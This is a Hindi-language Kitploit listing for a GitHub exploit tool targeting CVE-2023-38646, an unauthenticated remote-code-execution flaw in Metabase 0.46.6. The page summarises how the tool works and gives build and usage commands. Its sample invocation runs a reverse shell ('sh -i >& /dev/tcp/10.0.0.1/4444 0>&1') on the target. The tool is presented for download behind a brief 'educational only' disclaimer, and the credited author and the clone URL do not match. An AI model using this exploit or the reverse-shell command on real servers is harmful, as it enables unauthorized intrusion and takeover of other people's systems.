Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-38646 — CVE-2023-38646 के लिए Metabase 0.46.6 में शोषण, जो क्राफ्टेड अनुरोधों और सेटअप टोकन पुनर्प्राप्ति के माध्यम से रिमोट कोड निष्पादन को सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/danithehack3r/cve-2023-38646
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस ट्रोजन
GitHubdanithehack3r/cve-2023-38646

CVE-2023-38646

CVE-2023-38646 के लिए Metabase 0.46.6 में शोषण, जो क्राफ्टेड अनुरोधों और सेटअप टोकन पुनर्प्राप्ति के माध्यम से रिमोट कोड निष्पादन को सक्षम करता है।

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-38646

CVE-2023-38646 Metabase 0.46.6 शोषण

यह टूल एक सॉफ्टवेयर प्लेटफ़ॉर्म में कमज़ोरी (CVE-2023-38646) का शोषण करता है। यह शोषण एक क्राफ्टेड अनुरोध के माध्यम से रिमोट कोड निष्पादन की अनुमति देता है, जो गलत तरीके से संभाले गए डेटाबेस कनेक्शन स्ट्रिंग का लाभ उठाता है।

अवलोकन

यह टूल:

  • लक्ष्य URL से सेटअप टोकन प्राप्त करता है।
  • आपूर्ति किए गए कमांड को Base64 एन्कोड करता है।
  • एन्कोडेड कमांड के साथ पेलोड का निर्माण करता है।
  • कमज़ोरी का शोषण करने के लिए पेलोड भेजता है।

स्थापना

रिपॉजिटरी को क्लोन करें:

root@kitploit:~
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit

उपयोग

root@kitploit:~
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]

TARGET_URL: स्कैन और शोषण किए जाने वाले प्लेटफ़ॉर्म का URL। COMMAND: लक्ष्य पर निष्पादित किया जाने वाला कमांड। PROXY_URL (वैकल्पिक): प्रॉक्सी सर्वर का URL (जैसे, http://127.0.0.1:8080)। यदि प्रदान नहीं किया गया है, तो कोई प्रॉक्सी उपयोग नहीं किया जाएगा।

sh रिवर्स शेल के साथ उदाहरण

root@kitploit:~
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080

अस्वीकरण

यह टूल केवल शैक्षिक और शोध उद्देश्यों के लिए है। किसी भी लक्ष्य को स्कैन या शोषण करने से पहले हमेशा सुनिश्चित करें कि आपके पास उचित प्राधिकरण है। इस टूल का दुरुपयोग डेवलपर के इरादे के सख्त खिलाफ है और अवैध हो सकता है।

प्रतिक्रिया और योगदान

किसी भी प्रतिक्रिया, बग, या सुविधा अनुरोध के लिए बेझिझक issues खोलें। पुल अनुरोध हमेशा स्वागत योग्य हैं!

टूल डाउनलोड करें